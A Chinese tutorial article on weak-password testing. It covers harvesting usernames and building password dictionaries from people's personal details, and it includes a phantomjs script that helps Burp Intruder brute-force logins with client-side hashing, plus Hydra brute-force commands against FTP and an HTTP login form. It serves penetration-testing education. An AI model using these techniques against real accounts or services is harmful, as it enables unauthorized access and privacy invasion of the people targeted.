javascript弱口令掃描實(shí)例分析

今天小編給大家分享一下javascript弱口令掃描實(shí)例分析的相關(guān)知識(shí)點(diǎn)，內(nèi)容詳細(xì)，邏輯清晰，相信大部分人都還太了解這方面的知識(shí)，所以分享這篇文章給大家參考一下，希望大家閱讀完這篇文章后有所收獲，下面我們一起來(lái)了解一下吧。

1 弱口令

推薦 github 上的弱口令字典

2 生成社工屬性的弱口令

宗旨是生成能滿足密碼復(fù)雜度要求又好記的密碼。

2.1 獲取賬號(hào)

獲取用戶賬號(hào)的方式：

• 中國(guó)常用名 Top500，常見組合：

• 拼音的全拼+[數(shù)字]

• 姓全拼+名的首字母+[數(shù)字]

• 招聘網(wǎng)站

• 社交工具（脈脈）

• Google hacking

• 工號(hào)

  
  

2.2 密碼分片

用戶個(gè)人信息相關(guān)

• 姓名、昵稱、ID、QQ

• 生日，男/女友生日，特殊紀(jì)念日

• 手機(jī)號(hào)，男/女友手機(jī)號(hào)

• 父母親人相關(guān)信息

• 公司相關(guān)信息（域名、郵箱、公司電話、部門等）

習(xí)慣習(xí)性

• 鍵盤分布，SHIFT+鍵盤布局

• 特殊節(jié)日、紀(jì)念日、年份

• 好記的數(shù)字組合、字母組合

• 好記的特殊字符組合

• 特殊含義的單詞

• 特殊含義的字母數(shù)字替換（我-5，是-4，o-0）

  
  

2.3 組合方式

由被檢查方提供一份經(jīng)常使用的默認(rèn)密碼清單最好，下面是其他的一些組合方式：

• 有社工密碼可以根據(jù)之前的密碼使用歷史記錄針對(duì)性的生成組合。

• 部門的密碼使用習(xí)慣，趨于一致。

• 有含義字符@有含義數(shù)字，如姓名全拼@2017。

下面一張圖可以參考下

2.4 字典生成工具

白鹿社工字典生成器

genpAss

3 弱口令相關(guān)服務(wù)

所有可能存在未授權(quán)訪問類的服務(wù)

• 遠(yuǎn)程維護(hù)類服務(wù)（SSH、Tenlent、RDP 等）；

• 數(shù)據(jù)庫(kù)服務(wù)（MySQL、MSSQL、Oracle 、ES、MongoDB 等）；

• 緩存類服務(wù)（Redis、Kafka）；

• 大數(shù)據(jù)相關(guān)服務(wù)；

• 云環(huán)境各類接口、Docker 環(huán)境各類接口；

• 各種 Web 應(yīng)用系統(tǒng)、手機(jī)程序、小程序等。

  
  

4 爆破工具

4.1 Burp Intruder

使用示例
步驟：

1. 嘗試登錄，使用瀏覽器調(diào)試模式尋找加密函數(shù)所在的 js 文件，通常再調(diào)試模式下選取登錄元素，搜索使用的函數(shù)信息；

2. 通過檢查推導(dǎo)調(diào)用關(guān)系找到最終使用的加密 js 文件；

3. 將加密 js 文件下載到本地；

4. 利用 jsEncrypter 的 js 摸板加載使用的加密函數(shù)；

5. 使用 phantomjs 加載 jsEncrypter 的 js 摸板；

6. 使用 Burp 的 jsEncrypter 擴(kuò)展連接 phantomjs 開啟的服務(wù)；

7. 測(cè)試加密效果；

8. 使用 Burp Intruder 的 payload 處理功能，加載 jsEncrypter 對(duì)明文密碼處理后執(zhí)行爆破。

基礎(chǔ)的 js 腳本
 

/**
 * author: c0ny1
 * date: 2017-12-16
 * last update: 2019-5-30 11:16
 */
var fs = require('fs');
var logfile = 'jsEncrypter.log';
var webserver = require('webserver');
server = webserver.create();

var host = '127.0.0.1';
var port = '1664';

// 加載實(shí)現(xiàn)加密算法的js腳本
var wasSuccessful = phantom.injectJs('md5.js');/*引入實(shí)現(xiàn)加密的js文件*/

// 處理函數(shù)
function js_encrypt(payload){
    var newpayload;
    /**********在這里編寫調(diào)用加密函數(shù)進(jìn)行加密的代碼************/
    var newpayload = hex_md5(payload)+"djmis";


    /**********************************************************/
    return newpayload;
}

if(wasSuccessful){
    console.log("[*] load js successful");
    console.log("[!] ^_^");
    console.log("[*] jsEncrypterJS start!");
    console.log("[+] address: http://"+host+":"+port);
}else{
    console.log('[*] load js fail!');
}

var service = server.listen(host+':'+port,function(request, response){
    try{
        if(request.method == 'POST'){
            var payload = request.post['payload'];
            var encrypt_payload = js_encrypt(payload); 
            var log = payload + ':' + encrypt_payload;
            console.log('[+] ' + log);
            fs.write(logfile,log + '\n', 'w+');
            response.statusCode = 200;
            response.write(encrypt_payload.toString());
            response.close();
        }else{
              response.statusCode = 200;
              response.write("^_^\n\rhello jsEncrypter!");
              response.close();
        }
    }catch(e){
        //console.log('[Error]'+e.message+' happen '+e.line+'line');
        console.log('\n-----------------Error Info--------------------')
        var fullMessage = "Message: "+e.toString() + ':'+ e.line;
        for (var p in e) {
            fullMessage += "\n" + p.toUpperCase() + ": " + e[p];
        } 
        console.log(fullMessage);
        console.log('---------------------------------------------')
        console.log('[*] phantomJS exit!')
        phantom.exit();
    }   
});

效果

4.2 Hydra

使用-h獲取使用幫助，提供幾個(gè)使用示例

hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/

hydra 爆破 HTTP 請(qǐng)求

hydra -l admin -p password 192.168.43.131 http-post-form "/login.php:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect."

4.3 超級(jí)弱口令檢查工具

圖形界面

以上就是“javascript弱口令掃描實(shí)例分析”這篇文章的所有內(nèi)容，感謝各位的閱讀！相信大家閱讀完這篇文章都有很大的收獲，小編每天都會(huì)為大家更新不同的知識(shí)，如果還想學(xué)習(xí)更多的知識(shí)，請(qǐng)關(guān)注億速云行業(yè)資訊頻道。